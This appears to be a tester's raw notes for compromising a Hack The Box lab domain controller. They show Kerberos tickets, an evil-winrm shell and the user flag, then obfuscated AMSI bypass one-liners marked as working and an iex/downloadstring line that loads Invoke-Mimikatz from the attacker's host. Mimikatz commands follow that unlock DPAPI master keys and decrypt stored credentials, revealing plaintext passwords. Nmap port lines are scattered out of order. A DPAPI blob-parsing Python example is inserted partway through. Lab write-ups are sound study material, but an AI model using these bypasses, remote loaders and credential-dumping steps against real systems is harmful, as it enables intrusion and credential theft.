SMB dc01.vintage.htb 445 dc01.vintage.htb [+] vintage.htb\C.Neri:Zer0the0ne
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\P.Rosa: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\C.Neri_adm: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\L.Bianchi_adm: KDC_ERR_PREAUTH_FAILED
C.Neri:Zer0the0ne
According to LDAP, C.Neri is a member of Remote Management Users.
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open wsman
getTGT.py vintage.htb/C.Neri:Zer0the0ne -dc-ip 10.129.101.218
export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/C.Neri.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\C.Neri\Documents> whoami
vintage\c.neri
*Evil-WinRM* PS C:\Users\C.Neri\Documents> hostname
dc01
USER-SHELL !
*Evil-WinRM* PS C:\Users\C.Neri\Desktop> whoami
vintage\c.neri
*Evil-WinRM* PS C:\Users\C.Neri\Desktop> hostname
dc01
*Evil-WinRM* PS C:\Users\C.Neri\Desktop> dir
Directory: C:\Users\C.Neri\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2024 1:17 PM 2312 Microsoft Edge.lnk
-ar--- 1/4/2025 6:15 PM 34 user.txt
*Evil-WinRM* PS C:\Users\C.Neri\Desktop> type user.txt
[REDACTED]
USER.TXT: [REDACTED]
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/8/2024 3:36 PM Administrator
d----- 6/7/2024 11:27 PM C.Neri
d----- 6/7/2024 4:06 PM c.neri_adm
d-r--- 5/24/2024 2:00 PM Public
We are going to perform a DonPAPI-style attack like the one we did in RastaLabs.
AMSI BYPASS ?
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
-WORKS !
iex(new-object net.webclient).downloadstring('http://10.10.14.111/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"sekurlsa::dpapi" "exit"'
-WORKS !
Get-ChildItem C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\ -Force
*Evil-WinRM* PS C:\Users\C.Neri\Documents> Get-ChildItem C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\ -Force
Directory: C:\Users\C.Neri\AppData\Local\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 6/7/2024 1:17 PM 11020 DFBE70A7E5CC19A398EBF1B96859CE5D
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D" "exit"'
mimikatz(powershell) # dpapi::cred /in:C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {99cf41a3-a552-4cf7-a8d7-aca2d6f7339b}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data
*Evil-WinRM* PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> ls -force
Directory: C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 6/7/2024 5:08 PM 430 C4BB96844A5C9DD45D5B6A9859252BA6
ls -force C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\
*Evil-WinRM* PS C:\Users\C.Neri\Documents> ls -force C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\
Directory: C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 6/7/2024 1:17 PM S-1-5-21-4024337825-2033394866-2055507597-1115
-a-hs- 6/7/2024 1:17 PM 24 CREDHIST
-a-hs- 6/7/2024 1:17 PM 76 SYNCHIST
*Evil-WinRM* PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> ls -force
Directory: C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 6/7/2024 1:17 PM 740 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
-a-hs- 6/7/2024 1:17 PM 740 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b - THAT'S THE ONE
-a-hs- 6/7/2024 1:17 PM 904 BK-VINTAGE
-a-hs- 6/7/2024 1:17 PM 24 Preferred
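An added example (not from these notes) of what mimikatz reads to print the **BLOB** fields above: a parser for the DPAPI blob header inside a Windows credential file, which yields the guidMasterKey that selects the matching file in Protect\<SID> (the 99cf41a3-... entry marked above). It parses metadata only and decrypts nothing; the blob bytes and the 12-byte credential-file wrapper (version, size, reserved) are constructed to carry the header values shown in the mimikatz output.

```python
import struct
import uuid

# Added example, not from the original notes: read the DPAPI blob header that
# mimikatz prints as **BLOB** and map guidMasterKey to a master key file name.
# Metadata only, no decryption. The sample blob below is constructed.

CRYPTPROTECT_SYSTEM = 0x20000000
CALG_NAMES = {0x6603: "3DES", 0x6610: "AES-256", 0x8004: "SHA1", 0x800E: "SHA-512"}
HEADER_LEN = 48   # dwVersion, guidProvider, dwMasterKeyVersion, guidMasterKey, dwFlags, dwDescriptionLen


def _guid(raw):
    # Windows GUIDs store the first three fields little-endian
    return "{%s}" % uuid.UUID(bytes_le=bytes(raw))


def parse_dpapi_blob(blob):
    """Return the header fields of a DPAPI blob as a dict (same names mimikatz shows)."""
    if len(blob) < HEADER_LEN:
        raise ValueError("too short for a DPAPI blob")
    version, = struct.unpack_from("<I", blob, 0)
    mk_version, = struct.unpack_from("<I", blob, 20)
    flags, desc_len = struct.unpack_from("<II", blob, 40)
    off = HEADER_LEN
    description = blob[off:off + desc_len].decode("utf-16-le").rstrip("\x00")
    off += desc_len
    crypt_alg, crypt_bits, salt_len = struct.unpack_from("<III", blob, off)
    off += 12
    salt = blob[off:off + salt_len]
    off += salt_len
    hmac_key_len, = struct.unpack_from("<I", blob, off)
    off += 4 + hmac_key_len
    hash_alg, hash_bits = struct.unpack_from("<II", blob, off)
    return {
        "dwVersion": version,
        "guidProvider": _guid(blob[4:20]),
        "dwMasterKeyVersion": mk_version,
        "guidMasterKey": _guid(blob[24:40]),
        "dwFlags": flags,
        "system": bool(flags & CRYPTPROTECT_SYSTEM),   # mimikatz prints this as "(system ; )"
        "szDescription": description,
        "algCrypt": CALG_NAMES.get(crypt_alg, hex(crypt_alg)),
        "algHash": CALG_NAMES.get(hash_alg, hex(hash_alg)),
        "salt": salt.hex(),
    }


def unwrap_credential_file(data):
    """Strip the 12-byte wrapper (version, blob size, reserved) of a Microsoft\\Credentials file."""
    _version, size, _reserved = struct.unpack_from("<III", data, 0)
    return data[12:12 + size]


def required_masterkey(blob, protect_dir_names):
    """Pick the GUID-named master key file in Protect\\<SID> that this blob needs, or None."""
    guid = parse_dpapi_blob(blob)["guidMasterKey"].strip("{}")
    return next((n for n in protect_dir_names if n.lower() == guid), None)


def build_sample_blob():
    """Constructed blob carrying the header values shown in the mimikatz output above."""
    desc = "Local Credential Data\x00".encode("utf-16-le")
    hdr = (struct.pack("<I", 1) + uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le
           + struct.pack("<I", 1) + uuid.UUID("99cf41a3-a552-4cf7-a8d7-aca2d6f7339b").bytes_le
           + struct.pack("<II", CRYPTPROTECT_SYSTEM, len(desc)) + desc)
    salt = bytes(range(32))   # constructed, not a real salt
    body = (struct.pack("<III", 0x6610, 256, len(salt)) + salt + struct.pack("<I", 0)
            + struct.pack("<II", 0x800E, 512) + struct.pack("<I", 0)
            + struct.pack("<I", 16) + b"\x00" * 16 + struct.pack("<I", 64) + b"\x00" * 64)
    return hdr + body


def build_sample_credential_file():
    blob = build_sample_blob()
    return struct.pack("<III", 1, len(blob), 0) + blob


if __name__ == "__main__":
    blob = unwrap_credential_file(build_sample_credential_file())
    for k, v in parse_dpapi_blob(blob).items():
        print("%-20s: %s" % (k, v))
    listing = ["4dbf04d8-529b-4b4c-b4ae-8e875e4fe847", "99cf41a3-a552-4cf7-a8d7-aca2d6f7339b",
               "BK-VINTAGE", "Preferred"]
    print("master key file needed:", required_masterkey(blob, listing))
```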
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b" "/rpc" "exit"'
[SNIP]
Auto SID from path seems to be: S-1-5-21-4024337825-2033394866-2055507597-1115
[backupkey] without DPAPI_SYSTEM:
key : 90b520819fcae440ed4157dfcc0a2d17ab3e97e68cac0822cf255dd726260f23
sha1: 27c74b34937960c125f660bd8cce99dc6f084e7e
[domainkey] with RPC
[DC] 'vintage.htb' will be the domain
[DC] 'dc01.vintage.htb' will be the DC server
key : f8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
sha1: 665c9a57083d5dfae8627916fe4ad144006c59dc
[SNIP]
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b" "/sid:S-1-5-21-4024337825-2033394866-2055507597-1115" "/password:Zer0the0ne" "/protected" "exit"'
[SNIP]
[masterkey] with password: Zer0the0ne (protected user)
key : f8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
sha1: 665c9a57083d5dfae8627916fe4ad144006c59dc
[backupkey] without DPAPI_SYSTEM:
key : 90b520819fcae440ed4157dfcc0a2d17ab3e97e68cac0822cf255dd726260f23
sha1: 27c74b34937960c125f660bd8cce99dc6f084e7e
[SNIP]
Master Key: f8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\C4BB96844A5C9DD45D5B6A9859252BA6 /masterkey:f8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a" "exit"'
[SNIP]
TargetName : LegacyGeneric:target=admin_acc
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : vintage\c.neri_adm
CredentialBlob : Uncr4ck4bl3P4ssW0rd0312
Attributes : 0
vintage\c.neri_adm:Uncr4ck4bl3P4ssW0rd0312
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49674/tcp open unknown
49687/tcp open unknown
49695/tcp open unknown
57868/tcp open unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-03T15:16:05
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
https://notes.incendium.rocks/pentesting-notes/windows-pentesting/tools/bloodyad
https://gist.github.com/mpgn/9fc08b0f0fde55e8c322518bc1f9c317